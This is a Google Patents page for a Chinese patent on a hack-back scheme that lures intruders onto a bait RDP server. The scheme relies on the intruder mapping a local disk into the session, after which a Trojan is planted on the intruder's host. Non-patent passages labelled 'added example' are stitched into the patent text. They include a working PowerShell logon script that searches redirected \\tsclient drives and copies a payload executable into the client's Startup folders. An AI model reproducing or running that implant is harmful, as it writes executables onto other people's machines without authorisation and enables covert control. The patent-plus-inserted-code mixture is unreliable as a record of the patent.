CN112134868A - Attack countercheck method and system based on RDP disk mapping - Google Patents

Attack countering method and system based on RDP disk mapping

Info

Publication number
CN112134868A
Authority
CN
China
Prior art keywords
attacker
bait
server
host
rdp
Legal status
Pending
Application number
CN202010972668.8A
Other languages
Chinese (zh)
Inventor
吴建亮
胡鹏
吴岸宏
Current Assignee
Guangzhou Jeeseen Network Technologies Co Ltd
Original Assignee
Guangzhou Jeeseen Network Technologies Co Ltd
Application filed by Guangzhou Jeeseen Network Technologies Co Ltd
Priority to CN202010972668.8A
Publication of CN112134868A

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L 63/00 Network architectures or network communication protocols for network security
    • H04L 63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L 63/1441 Countermeasures against malicious traffic
    • H04L 63/1491 Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
    • H04L 63/08 Network architectures or network communication protocols for network security for authentication of entities

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer And Data Communications (AREA)

Abstract

The invention provides an attack countering method and system based on RDP disk mapping, in the technical field of network security. In the method, the IP address, login account and login password of an RDP (Remote Desktop Protocol) server are stored in an enterprise network asset as bait. Once an attacker obtains the bait and logs in to the RDP server, a disguised file bait stored on that server induces the attacker to copy and paste it to the attacker's host. Because the RDP server has its copy and paste function turned off, the copy fails; a local group policy of the RDP server then induces the attacker to map a local disk into the session. The file bait runs automatically whenever the attacker logs in to the RDP server and, through the mapped disk, implants an executable file into the attacker's host, completing the countering of the attacker. The invention uses the disk mapping function of RDP to implant executable files such as Trojans back onto the attacker's computer, thereby achieving control of the attacker's computer.

Description

Attack countering method and system based on RDP disk mapping
Technical Field
The invention relates to the technical field of network security, in particular to an attack countering method and system based on RDP disk mapping.
Background
Network attacks and attackers are increasingly numerous, but the means of tracing attackers, such as tracing the attacker's IP address or device fingerprint, are often ineffective. A more effective means of countering attackers, built on top of tracing, is therefore needed. Existing means of countering attackers are few and are usually based on honeypot technology.
Chinese patent application CN108134797A discloses an attack countering system and method based on honeypot technology. The system comprises a honeypot host, a honeypot environment deployment module, a countering mechanism setting module and a countering module server; a countering module client that collects information is placed on the attacker's host and in the attacker's network environment, and the honeypot host contains specific documents and specific system mechanisms. The honeypot environment deployment module sends signals to the honeypot host; the countering mechanism setting module sends signals to the specific documents and specific system mechanisms in the honeypot host; both of these send signals to the countering module client, which forwards them to the countering module server. The information collected by the countering module client comprises information about the attacker and the attacker's environment; the specific documents include Word document exploits and RTF document exploits, and the specific system mechanisms include a Windows RDP implant. The method is based on honeypot technology, is costly, and its effect is not controllable.
Chinese patent application CN108540441A discloses an active defence system and method based on a realistic virtual network. The system comprises the following modules, which communicate with one another by passing signals: an attack detection module that detects various attack behaviours and raises alarms in real time; a decoy guidance module that lures the attacker into continuing to attack false targets inside the system; a vulnerability simulation module that builds a genuinely vulnerable system out of real virtual hosts and networks so that the attacker's attack appears to succeed; an attack isolation module that keeps the attacker completely isolated from the real environment inside the system's virtual network, so that the virtual network cannot become a pivot point for the attacker; a behaviour recording module that records all of the attacker's actions; an intelligent analysis module that analyses attack characteristics such as attack level, attack path, attack method and attack intent; an attack playback module that replays the attack dynamically through a friendly interface; and an attack countering module that covertly obtains the attacker's information and counters the attacker. The system captures and analyses the attacker's behaviour, obtains the attacker's information and controls the attacker by simulating a virtual network. It is based on honeypot technology, is complex and difficult to implement, and does not provide a concrete technical means of controlling the attacker.
The prior art therefore has at least the following disadvantages:
1. Being based on honeypot technology, it is costly and its effect is not controllable.
2. Schemes that simulate a virtual network in order to covertly collect the attacker's information and attack behaviour provide no concrete technical means of countering the attacker, so there is nothing to build on.
Disclosure of Invention
To solve the problems of the prior art, the invention provides an attack countering method and system based on RDP disk mapping. In the method, information about an RDP server, including its IP address, login account and login password, is stored in an enterprise network asset as bait. Once an attacker obtains the bait and logs in to the RDP server, a high-value disguised file bait stored on the server induces the attacker to copy and paste it to the attacker's host. Because the RDP server has its copy and paste function turned off, the copy fails; a local group policy of the RDP server then induces the attacker to map a local disk into the session. The file bait runs automatically whenever the attacker logs in to the RDP server and implants an executable file (an offensive one) into the attacker's host, completing the countering of the attacker. The invention uses the disk mapping function of RDP to implant executable files such as Trojans back onto the attacker's computer, thereby achieving control of the attacker's computer.
RDP (Remote Desktop Protocol) is a multi-channel protocol that allows a client to connect to a remote computer providing Microsoft terminal services. Disk mapping (drive redirection) makes the client's local drives available inside the remote session, so that the session can access them as if they were local; inside an RDP session the client's redirected drives appear as \\tsclient\<drive letter>, and the session reads and writes them with the permissions of the client user.
By contrast, when a client mounts an NFS export from a Linux server, the Linux server gains no write access to the client's host, so NFS mounting cannot be used for this purpose. With Windows RDP disk mapping the session on the server does have write access to the mapped client disk, and the method of the invention exploits exactly this property to counter the attacker.
The invention provides an attack countering method based on RDP disk mapping, comprising the following steps:
a first bait server construction step, in which
a first bait is stored in a first bait server, the first bait comprising information about a second bait server;
the information about the second bait server comprises credentials for logging in to the second bait server;
a second bait server construction step, in which
RDP is configured on the second bait server;
a second bait is deposited in the second bait server, the second bait including autorun code;
the code runs automatically when a user logs in successfully, and its execution implants a first countering instruction into the attacker's host; the first countering instruction is used to counter the attacker;
a local group policy of the second bait server's operating system is configured, and the copy and paste function of the second bait server is turned off.
Preferably, configuring the local group policy further includes setting a user logon script that induces the attacker to perform disk mapping.
Preferably, the second bait server construction step is followed by an attack and countering step, specifically comprising:
the attacker successfully attacks the first bait server and obtains the first bait;
the attacker logs in to the second bait server using the information in the first bait;
the second bait server runs the autorun code, which waits for a disk of the attacker's host to be mapped onto the second bait server;
the attacker attempts to copy the second bait from the second bait server and fails;
induced by the local group policy of the second bait server, the attacker maps a disk of the attacker's host onto the second bait server in order to drag the second bait across;
the autorun code running on the second bait server implants the first countering instruction into the attacker's host;
the first countering instruction is executed to control the attacker's host.
Preferably, the first countering instruction is implanted into a startup directory of the attacker's host and executed at the same time.
Preferably, the information about the second bait server deposited in the first bait server includes the IP address, login account and login password of the second bait server.
Preferably, the file name of the second bait and the file name of the autorun code are chosen to be enticing: the file name contains any one of, or any combination of variants of, "password", "IP" or "username", or other terms of equivalent meaning that relate to authentication.
Preferably, the first countering instruction is an executable file for countering the attacker, which performs the following operations:
counterattacking the attacker's host in order to control it;
obtaining information about the attacker's host for attack analysis.
The invention further provides an attack countering system based on RDP disk mapping, comprising:
a first bait server and a second bait server;
and further comprising
a bait setting module, which performs the following operations:
generating a first bait and storing it on the first bait server, the first bait including information about the second bait server;
generating a second bait and storing it on the second bait server, the second bait comprising autorun code that runs automatically when a user logs in, the execution of which implants a first countering instruction into the attacker's host; the first countering instruction is used to counter the attacker;
a second bait server local group policy setting module, which
sets a local group policy for the operating system of the second bait server, comprising:
setting a user logon script that induces the attacker to perform disk mapping;
turning off the copy and paste function of the second bait server.
Preferably, the system further comprises an attack analysis module, configured to analyse attack behaviour from the attacker host information obtained by the first countering instruction implanted into the attacker's host.
Preferably, the implanted first countering instruction is an executable file for countering the attacker, which performs the following operations:
counterattacking the attacker's host in order to control it;
obtaining information about the attacker's host for analysing the attack behaviour.
Compared with the prior art, the invention has the following beneficial effects:
1. The method uses the RDP disk mapping function to implant offensive executable files such as Trojans back onto the attacker's host, thereby achieving control of the attacker's host; it is low in cost and is simpler and more effective than other honeypot-based countermeasures.
Drawings
FIG. 1 is a flow chart of an attack countering method based on RDP disk mapping according to the present invention;
FIG. 2 is a block diagram of an attack countering system based on RDP disk mapping according to the present invention.
Detailed Description
The invention is described in detail below with reference to FIGS. 1-2.
The invention provides an attack countering method based on RDP disk mapping, comprising the following steps:
a first bait server construction step, in which
a first bait is stored in a first bait server, the first bait comprising information about a second bait server;
the information about the second bait server comprises credentials for logging in to the second bait server;
Attackers are usually interested in login credentials. The first bait therefore stores information about the second bait server, including the credentials for logging in to it, so that the attacker is induced to log in to the second bait server with the acquired credentials, where the next countering step takes place.
a second bait server construction step, in which
RDP is configured on the second bait server;
The method uses the disk mapping function of RDP, so RDP must be configured on the second bait server in preparation for the attacker's disk mapping in the next step;
a second bait is deposited in the second bait server, the second bait including autorun code;
the code runs automatically when a user logs in successfully, and its execution implants a first countering instruction into the attacker's host; the first countering instruction is used to counter the attacker;
The code is a logon script, which runs as soon as a user logs in, regardless of whether a disk has been mapped. Its effect is that, once the attacker's disk is mapped, the first countering instruction (an executable file such as a Trojan) is implanted into the attacker's host. If the attacker does not map a disk, the script still runs but cannot achieve the intended effect.
After the attacker compromises the first bait server and obtains its privileges, the attacker finds the credential bait for the second bait server planted there and tries to connect to the second bait server. After logging in, the attacker finds the second bait, a forged high-value file with an enticing name, and typically tries to steal it. Once the second bait has done its work, the first countering instruction is implanted into the attacker's host, the attacker's host is controlled, and the countering of the attacker is achieved.
A local group policy of the second bait server's operating system is configured, and the copy and paste function of the second bait server is turned off.
The copy and paste function of the second bait server is turned off so that the attacker's attempt to copy and paste the second bait fails and the attacker resorts to disk mapping, through which the first countering instruction can be implanted into the attacker's host. In the Group Policy Editor this is done under Computer Configuration > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Device and Resource Redirection, by setting "Do not allow Clipboard redirection" to Enabled; "Do not allow drive redirection" must stay Disabled or Not Configured, otherwise the attacker cannot map a disk either.
As a preferred embodiment, configuring the local group policy further includes setting a user logon script that induces the attacker to perform disk mapping. The logon script is set in the Group Policy Editor under User Configuration > Windows Settings > Scripts (Logon/Logoff) > Logon.
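The second bait server configuration described above, written out as a PowerShell provisioning script. This is an added example, not code from the patent: the bait account name svc_backup, the staging directory C:\ProgramData\bait and the logon script file name Logon-Counter.ps1 are assumptions. It sets the two Device and Resource Redirection policies through their registry-backed values (fDisableClip for clipboard redirection, fDisableCdm for drive redirection), enables Remote Desktop for the bait account, stages the logon script in the local GPO scripts folder, and reads the policy back so that a host with the clipboard still open is not exposed.

```powershell
# Added example: provision the second bait server (run once, elevated, on Windows Server).
# Assumptions, not from the patent: account name, staging directory and script file name.
$BaitAccount = 'svc_backup'
$StageDir    = 'C:\ProgramData\bait'
$LogonScript = Join-Path $StageDir 'Logon-Counter.ps1'

$TsKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
$GpoLogon  = Join-Path $env:SystemRoot 'System32\GroupPolicy\User\Scripts\Logon'

# 1. Enable Remote Desktop and let the bait account log in over RDP.
Set-ItemProperty -Path $TsKey -Name fDenyTSConnections -Value 0 -Type DWord
Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
if (-not (Get-LocalGroupMember -Group 'Remote Desktop Users' -Member $BaitAccount -ErrorAction SilentlyContinue)) {
    Add-LocalGroupMember -Group 'Remote Desktop Users' -Member $BaitAccount
}

# 2. Device and Resource Redirection policy (Computer Configuration > Administrative Templates >
#    Windows Components > Remote Desktop Services > Remote Desktop Session Host):
#    "Do not allow Clipboard redirection" = Enabled  -> fDisableClip = 1 (copy/paste fails)
#    "Do not allow drive redirection"     = Disabled -> fDisableCdm  = 0 (disk mapping allowed)
New-Item -Path $PolicyKey -Force | Out-Null
Set-ItemProperty -Path $PolicyKey -Name fDisableClip -Value 1 -Type DWord
Set-ItemProperty -Path $PolicyKey -Name fDisableCdm  -Value 0 -Type DWord

# 3. Stage the logon script in the local GPO scripts folder. It is registered in gpedit.msc
#    under User Configuration > Windows Settings > Scripts (Logon/Logoff) > Logon.
New-Item -ItemType Directory -Path $GpoLogon -Force | Out-Null
Copy-Item -Path $LogonScript -Destination $GpoLogon -Force

# 4. Read the policy back before exposing the host: with the clipboard still open the
#    attacker copies the bait out and never maps a disk, and the whole chain fails.
$applied = Get-ItemProperty -Path $PolicyKey
if ($applied.fDisableClip -ne 1 -or $applied.fDisableCdm -ne 0) {
    throw "Redirection policy not applied: fDisableClip=$($applied.fDisableClip) fDisableCdm=$($applied.fDisableCdm)"
}
gpupdate.exe /force | Out-Null
Write-Output 'Bait RDP host ready: clipboard redirection off, drive redirection on, logon script staged.'
```

The two policy values are deliberately set together: enabling "Do not allow drive redirection" as well would close the only channel the method relies on, which is why the script fails loudly rather than silently if the readback does not match.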
As a preferred embodiment, the second bait server construction step is followed by an attack and countering step, specifically comprising:
the attacker successfully attacks the first bait server and obtains the first bait;
the attacker logs in to the second bait server using the information in the first bait;
the second bait server runs the autorun code, which waits for a disk of the attacker's host to be mapped onto the second bait server;
the attacker attempts to copy the second bait from the second bait server and fails;
induced by the local group policy of the second bait server, the attacker maps a disk of the attacker's host onto the second bait server in order to drag the second bait across;
the autorun code running on the second bait server implants the first countering instruction into the attacker's host;
the first countering instruction is executed to control the attacker's host.
In a preferred embodiment, the first countering instruction is implanted into a startup directory of the attacker's host and executed at the same time.
The first countering instruction is implanted into the startup directory of the attacker's host in order to obtain control of that host: the attacker's host runs the first countering instruction directly the next time it starts, so that it is controlled by the second bait server from boot. The first countering instruction is executed at the time it is implanted into the startup directory, obtaining information about the attacker's host and controlling it.
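The autorun code of the second bait, that is, the user logon script described in the "logon script" paragraph above and again in the startup-directory paragraph, as an added example that is not the patent's own code. It runs inside the bait account's RDP session, records the session's client name and peer address for the attack analysis module, plants a note that nudges the attacker towards drive redirection, then polls for a redirected client drive (visible to the session as \\tsclient\<letter>) and copies the countering executable into every Startup folder it can reach on that drive. The payload path C:\ProgramData\bait\passwords.exe (named per the enticing-file-name rule), the log path, the note text and the 30-minute wait are assumptions. One caveat the patent glosses over: drive redirection is a file-system channel only, so the script can write the file but cannot start it on the attacker's machine; it runs when the attacker next logs in interactively, or if the attacker runs it by hand.

```powershell
# Added example: user logon script for the second bait server (the second bait's autorun code).
# Assumptions, not from the patent: payload path and name, log path, note text, wait time.
$Payload    = 'C:\ProgramData\bait\passwords.exe'   # the "first countering instruction"
$LogFile    = 'C:\ProgramData\bait\counter.log'
$WaitUntil  = (Get-Date).AddMinutes(30)
$StartupRel = 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'

function Write-BaitLog([string]$Message) {
    "$(Get-Date -Format o) user=$env:USERNAME client=$env:CLIENTNAME $Message" | Add-Content -Path $LogFile
}

# Session metadata for the attack analysis module. CLIENTNAME is set by RDP; the peer
# address is read from the established connection on the RDP listener.
$peer = Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction SilentlyContinue |
        Select-Object -First 1 -ExpandProperty RemoteAddress
Write-BaitLog "logon from peer=$peer"

# Nudge: with clipboard redirection disabled, a mapped drive is the only way to get a file out.
$note = Join-Path $env:USERPROFILE 'Desktop\README_file_transfer.txt'
'Clipboard is disabled by policy. To transfer files, reconnect with a local drive shared ' +
'(mstsc > Local Resources > More > Drives) and drag files onto it.' | Set-Content -Path $note

# Wait for a redirected drive to appear, then implant into each reachable Startup folder.
$implanted = 0
while ($implanted -eq 0 -and (Get-Date) -lt $WaitUntil) {
    foreach ($code in 65..90) {
        $root = "\\tsclient\$([char]$code)"
        if (-not (Test-Path -Path $root)) { continue }
        Write-BaitLog "redirected drive visible: $root"
        $profiles = Get-ChildItem -Path (Join-Path $root 'Users') -Directory -ErrorAction SilentlyContinue
        foreach ($profile in $profiles) {
            $startup = Join-Path $profile.FullName $StartupRel
            if (-not (Test-Path -Path $startup)) { continue }
            try {
                # Access is the client user's: a read-only or unprivileged mapping throws here.
                Copy-Item -Path $Payload -Destination $startup -Force -ErrorAction Stop
                $implanted++
                Write-BaitLog "implanted $(Split-Path $Payload -Leaf) into $startup"
            } catch {
                Write-BaitLog "implant failed for $startup : $($_.Exception.Message)"
            }
        }
    }
    if ($implanted -eq 0) { Start-Sleep -Seconds 15 }
}
if ($implanted -eq 0) { Write-BaitLog 'no writable redirected drive before timeout' }
```

Polling drive letters rather than assuming C: matters because the attacker chooses which local drives to redirect; if only a data drive is shared there is no Users folder to write to, and the log line records that the mapping happened even though no implant was possible.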
In a preferred embodiment, the information about the second bait server stored in the first bait server includes the IP address, login account and login password of the second bait server.
In a preferred embodiment, the file name of the second bait and the file name of the autorun code are chosen to be enticing: the file name contains any one of, or any combination of variants of, "password", "IP" or "username", or other terms of equivalent meaning that relate to authentication.
As a preferred embodiment, the first countering instruction is an executable file for countering the attacker, which performs the following operations:
counterattacking the attacker's host in order to control it;
obtaining information about the attacker's host for attack analysis.
The invention further provides an attack countering system based on RDP disk mapping, comprising:
a first bait server and a second bait server;
and further comprising
a bait setting module, which performs the following operations:
generating a first bait and storing it on the first bait server, the first bait including information about the second bait server;
generating a second bait and storing it on the second bait server, the second bait comprising autorun code that runs automatically when a user logs in, the execution of which implants a first countering instruction into the attacker's host; the first countering instruction is used to counter the attacker;
the second bait induces the attacker to try to obtain it, and the attacker performs disk mapping after the attempt to copy and paste it fails;
a second bait server local group policy setting module, which
sets a local group policy for the operating system of the second bait server, comprising:
setting a user logon script that induces the attacker to perform disk mapping;
turning off the copy and paste function of the second bait server.
As a preferred embodiment, the system further comprises an attack analysis module, configured to analyse attack behaviour from the attacker host information obtained by the first countering instruction implanted into the attacker's host.
In a preferred embodiment, the implanted first countering instruction is an executable file for countering the attacker, which performs the following operations:
counterattacking the attacker's host in order to control it;
obtaining information about the attacker's host for analysing the attack behaviour.
Example 1
Referring to FIGS. 1-2, an attack countering method based on RDP disk mapping according to an embodiment of the present invention is described in detail.
The invention provides an attack countering method based on RDP disk mapping, comprising the following steps:
a first bait server construction step, in which
a first bait is stored in a first bait server, the first bait comprising information about a second bait server;
the information about the second bait server comprises credentials for logging in to the second bait server; the information about the second bait server stored in the first bait server includes the IP address, login account and login password of the second bait server.
Attackers are usually interested in login credentials. The first bait therefore stores information about the second bait server, including the credentials for logging in to it, so that the attacker is induced to log in to the second bait server with the acquired credentials, where the next countering step takes place.
a second bait server construction step, in which
RDP is configured on the second bait server;
The method uses the disk mapping function of RDP, so RDP must be configured on the second bait server in preparation for the attacker's disk mapping in the next step;
a second bait is deposited in the second bait server, the second bait including autorun code; the file name of the second bait and the file name of the autorun code are chosen to be enticing: the file name contains any variant of, or any combination of variants of, "password", "IP" or "username", or other terms of equivalent meaning that relate to authentication.
The code runs automatically when a user logs in successfully, and its execution implants a first countering instruction into the attacker's host; the first countering instruction is used to counter the attacker;
The code is a logon script, which runs as soon as a user logs in, regardless of whether a disk has been mapped. Its effect is that, once the attacker's disk is mapped, the first countering instruction (an executable file such as a Trojan) is implanted into the attacker's host. If the attacker does not map a disk, the script still runs but cannot achieve the intended effect.
After the attacker compromises the first bait server and obtains its privileges, the attacker finds the credential bait for the second bait server planted there and tries to connect to the second bait server. After logging in, the attacker finds the second bait, a forged high-value file with an enticing name, and typically tries to steal it. Once the second bait has done its work, the first countering instruction is implanted into the attacker's host, the attacker's host is controlled, and the countering of the attacker is achieved.
The first countering instruction is implanted into a startup directory of the attacker's host and executed at the same time. It is implanted into the startup directory in order to obtain control of the attacker's host: the attacker's host runs the first countering instruction directly the next time it starts, so that it is controlled by the second bait server from boot. The first countering instruction is executed at the time it is implanted into the startup directory, obtaining information about the attacker's host and controlling it.
The first countering instruction is an executable file for countering the attacker, which performs the following operations:
counterattacking the attacker's host in order to control it;
obtaining information about the attacker's host for attack analysis.
A local group policy of the second bait server's operating system is configured, and the copy and paste function of the second bait server is turned off.
The copy and paste function of the second bait server is turned off so that the attacker's attempt to copy and paste the second bait fails and the attacker resorts to disk mapping, through which the first countering instruction can be implanted into the attacker's host. In the Group Policy Editor this is done under Computer Configuration > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Device and Resource Redirection, by setting "Do not allow Clipboard redirection" to Enabled; "Do not allow drive redirection" must stay Disabled or Not Configured, otherwise the attacker cannot map a disk either.
Configuring the local group policy further includes setting a user logon script that induces the attacker to perform disk mapping. The logon script is set in the Group Policy Editor under User Configuration > Windows Settings > Scripts (Logon/Logoff) > Logon.
The method further comprises an attack and countering step after the second bait server construction step, specifically comprising:
the attacker successfully attacks the first bait server and obtains the first bait;
the attacker logs in to the second bait server using the information in the first bait;
the second bait server runs the autorun code, which waits for a disk of the attacker's host to be mapped onto the second bait server;
the attacker attempts to copy the second bait from the second bait server and fails;
induced by the local group policy of the second bait server, the attacker maps a disk of the attacker's host onto the second bait server in order to drag the second bait across;
the autorun code running on the second bait server implants the first countering instruction into the attacker's host;
the first countering instruction is executed to control the attacker's host.
The invention further provides an attack countering system based on RDP disk mapping, comprising:
a first bait server and a second bait server;
and further comprising
a bait setting module, which performs the following operations:
generating a first bait and storing it on the first bait server, the first bait including information about the second bait server;
generating a second bait and storing it on the second bait server, the second bait comprising autorun code that runs automatically when a user logs in, the execution of which implants a first countering instruction into the attacker's host; the first countering instruction is used to counter the attacker;
the second bait induces the attacker to try to obtain it, and the attacker performs disk mapping after the attempt to copy and paste it fails;
a second bait server local group policy setting module, which
sets a local group policy for the operating system of the second bait server, comprising:
setting a user logon script that induces the attacker to perform disk mapping;
turning off the copy and paste function of the second bait server.
The attack countering system further comprises an attack analysis module, which analyses the attack from the attacker host information obtained by the first countering instruction implanted into the attacker's host.
The implanted first countering instruction is an executable file for countering the attacker, which performs the following operations:
counterattacking the attacker's host in order to control it;
obtaining information about the attacker's host for attack analysis.
The above description is only a preferred embodiment of the present invention and is not intended to limit it; those skilled in the art may make various modifications and changes. Any modification, equivalent replacement or improvement made within the spirit and principle of the present invention falls within its scope of protection.

Claims (10)

1. An attack countering method based on RDP disk mapping, characterised by comprising the following steps:
a first bait server construction step, in which
a first bait is stored in a first bait server, the first bait comprising information about a second bait server;
the information about the second bait server comprises credentials for logging in to the second bait server;
a second bait server construction step, in which
RDP is configured on the second bait server;
a second bait is deposited in the second bait server, the second bait including autorun code;
the code runs automatically when a user logs in successfully, and its execution implants a first countering instruction into the attacker's host; the first countering instruction is used to counter the attacker;
a local group policy of the second bait server's operating system is configured, and the copy and paste function of the second bait server is turned off.
2. The RDP-disk-mapping-based attack countering method according to claim 1, wherein configuring the local group policy further comprises setting a user login script for inducing an attacker to perform disk mapping.
3. The RDP-disk-mapping-based attack countering method according to claim 1, further comprising an attack and attack countering step after the second bait server construction step, specifically comprising:
an attacker successfully attacks the first bait server to obtain a first bait;
the attacker logs in a second bait server according to the information of the first bait;
the second bait server runs the autorun code and waits for the disk of the attacker host to be mapped to the second bait server;
the attacker attempts to copy the second bait from the second bait server and fails;
the attacker is induced by the local group policy of the second bait server and maps a disk of the attacker host onto the second bait server in order to drag the second bait across;
the autorun code run by the second bait server implants the first countering instruction into the attacker host;
and the first countering instruction is executed to control the host of the attacker.
4. The RDP disk mapping-based attack countering method according to claim 1 or 3, characterized in that the first countering instruction is implanted into a boot directory of an attacker host and executed simultaneously.
5. The RDP-disk-mapping-based attack countering method according to claim 1, wherein the information of the second bait server stored in the first bait server includes: an IP address, a login account number, and a login password of the second bait server.
6. The RDP disk mapping-based attack countering method according to claim 1, wherein the file name of the second bait and the file name of the autorun code are decoy names, and each file name includes any one or any combination of "password", "IP" and "username", or other words of the same meaning indicating authentication-related information.
7. The RDP-disk-mapping-based attack countering method according to claim 1, wherein the first countering instruction is an executable file for countering an attacker by performing the following operations:
carrying out counter attack on the attacker host to control the attacker host;
and obtaining host information of the attacker for attack analysis.
8. An attack countering system based on RDP disk mapping, characterized by comprising:
a first bait server and a second bait server;
further comprising:
a bait setting module for performing the following operations:
generating a first bait, and storing the first bait on a first bait server; the first bait includes information of a second bait server;
generating a second bait, and storing the second bait on a second bait server; the second bait comprises autorun code, the code running automatically when a user logs in, and the execution of the code implants a first countering instruction into the host of the attacker; the first countering instruction is used for countering the attacker;
a second bait server local group policy setting module to:
setting a local group policy for a system of second bait servers, comprising:
setting a user login script and inducing an attacker to carry out disk mapping;
the copy and paste function of the second bait server is turned off.
9. The RDP disk mapping-based attack countering system of claim 8, further comprising an attack analysis module, configured to perform attack behavior analysis according to information of the attacker host obtained by the first countering instruction implanted into the attacker.
10. The RDP-disk-map-based attack countering system of claim 8, wherein the first countering instruction is an executable file for countering an attacker by:
carrying out counter attack on the attacker host to control the attacker host;
and obtaining host information of the attacker for analyzing the attack behavior.
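Claims 1, 2 and 8 describe the local policy of the second bait server: clipboard redirection switched off, a login script that induces disk mapping, and code that runs at login and waits for the attacker's disk to appear in the session. The PowerShell below is an added example of that configuration; it is not the patent's or the applicant's code. The two Terminal Services values `fDisableClip` and `fDisableCdm` are the documented Windows policy registry values behind "Do not allow Clipboard redirection" and "Do not allow drive redirection"; the directory `C:\BaitServer`, the log file, the README wording and the Run-key value name `BaitLogon` are assumptions made for this example. In place of the implant step of the claims, the login script only records that a redirected client drive (`\\tsclient\<letter>`) became visible, which is the event the attack analysis module of claim 9 would consume; it never reads from or writes to the mapped drive.

```powershell
# Added example, not the patent's own code: local policy for a "second bait server"
# (claims 1, 2 and 8). File paths, message text and the Run-key name are assumptions.

# 1. Terminal Services policy: clipboard redirection off, drive redirection still allowed.
#    Both value names are the documented Windows policy registry values.
$tsPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
New-Item -Path $tsPolicy -Force | Out-Null
Set-ItemProperty -Path $tsPolicy -Name 'fDisableClip' -Type DWord -Value 1   # clipboard off
Set-ItemProperty -Path $tsPolicy -Name 'fDisableCdm'  -Type DWord -Value 0   # drive mapping allowed

# 2. Logon script (assumed location C:\BaitServer\logon.ps1). It leaves the inducing
#    message on the desktop and then waits for an RDP-redirected client drive
#    (\\tsclient\<letter>) to appear. Only the presence of the drive is logged for the
#    analysis module; the script never touches the drive's contents.
$baitDir = 'C:\BaitServer'
New-Item -ItemType Directory -Path $baitDir -Force | Out-Null

$logonScript = @'
function Stamp { (Get-Date).ToString('o') }
$log     = 'C:\BaitServer\session.log'        # assumed log location
$session = "user=$env:USERNAME session=$env:SESSIONNAME client=$env:CLIENTNAME"
"$(Stamp) logon $session" | Add-Content -Path $log

# Inducement text (deception content; wording is an assumption).
$readme = Join-Path ([Environment]::GetFolderPath('Desktop')) 'README.txt'
Set-Content -Path $readme -Value @"
Clipboard transfer is disabled on this host by policy.
To transfer files, enable drive redirection (Local Resources) in your RDP client.
"@

# Poll for up to one hour (360 x 10 s) for a redirected client drive; log the first one seen.
for ($i = 0; $i -lt 360; $i++) {
    $seen = foreach ($code in 67..90) {          # ASCII 67..90 = drive letters C..Z
        $letter = [char]$code
        if (Test-Path -LiteralPath "\\tsclient\$letter") { $letter }
    }
    if ($seen) {
        "$(Stamp) client-drive-mapped letters=$($seen -join ',') $session" | Add-Content -Path $log
        break
    }
    Start-Sleep -Seconds 10
}
'@
Set-Content -Path (Join-Path $baitDir 'logon.ps1') -Value $logonScript

# 3. Run the script at every interactive logon (machine-wide Run key; value name assumed).
$runKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
Set-ItemProperty -Path $runKey -Name 'BaitLogon' -Value `
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File `"$baitDir\logon.ps1`""
```

Run the block once, elevated, on the bait server. The resulting `session.log` lines (`logon ...` followed by `client-drive-mapped ...`) give the analysis module the sequence the claims rely on: a login with the first bait's credentials, and the moment the remote host's disk was redirected into the session.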
CN202010972668.8A 2020-09-16 2020-09-16 Attack countercheck method and system based on RDP disk mapping Pending CN112134868A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202010972668.8A CN112134868A (en) 2020-09-16 2020-09-16 Attack countercheck method and system based on RDP disk mapping

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202010972668.8A CN112134868A (en) 2020-09-16 2020-09-16 Attack countercheck method and system based on RDP disk mapping

Publications (1)

Publication Number Publication Date
CN112134868A true CN112134868A (en) 2020-12-25

Family

ID=73845776

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202010972668.8A Pending CN112134868A (en) 2020-09-16 2020-09-16 Attack countercheck method and system based on RDP disk mapping

Country Status (1)

Country Link
CN (1) CN112134868A (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN113411314A (en) * 2021-05-26 2021-09-17 杭州安恒信息技术股份有限公司 Method and device for attracting attacker to access honeypot system and electronic device
CN114157454A (en) * 2021-11-16 2022-03-08 中国工商银行股份有限公司 Attack countercheck method, device, computer equipment and storage medium
CN115065528A (en) * 2022-06-14 2022-09-16 上海磐御网络科技有限公司 Attack countercheck system and method based on ftp service

Cited By (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN113411314A (en) * 2021-05-26 2021-09-17 杭州安恒信息技术股份有限公司 Method and device for attracting attacker to access honeypot system and electronic device
CN114157454A (en) * 2021-11-16 2022-03-08 中国工商银行股份有限公司 Attack countercheck method, device, computer equipment and storage medium
CN114157454B (en) * 2021-11-16 2024-04-02 中国工商银行股份有限公司 Attack countering method, device, computer equipment and storage medium
CN115065528A (en) * 2022-06-14 2022-09-16 上海磐御网络科技有限公司 Attack countercheck system and method based on ftp service

Similar Documents

Publication Publication Date Title
US9773109B2 (en) Alternate files returned for suspicious processes in a compromised computer network
US9356957B2 (en) Systems, methods, and media for generating bait information for trap-based defenses
CN112134868A (en) Attack countercheck method and system based on RDP disk mapping
US10567432B2 (en) Systems and methods for incubating malware in a virtual organization
Ianelli et al. Botnets as a vehicle for online crime
US11057429B1 (en) Honeytoken tracker
Grimes Honeypots for windows
Frank et al. Protecting IoT from Mirai botnets; IoT device hardening
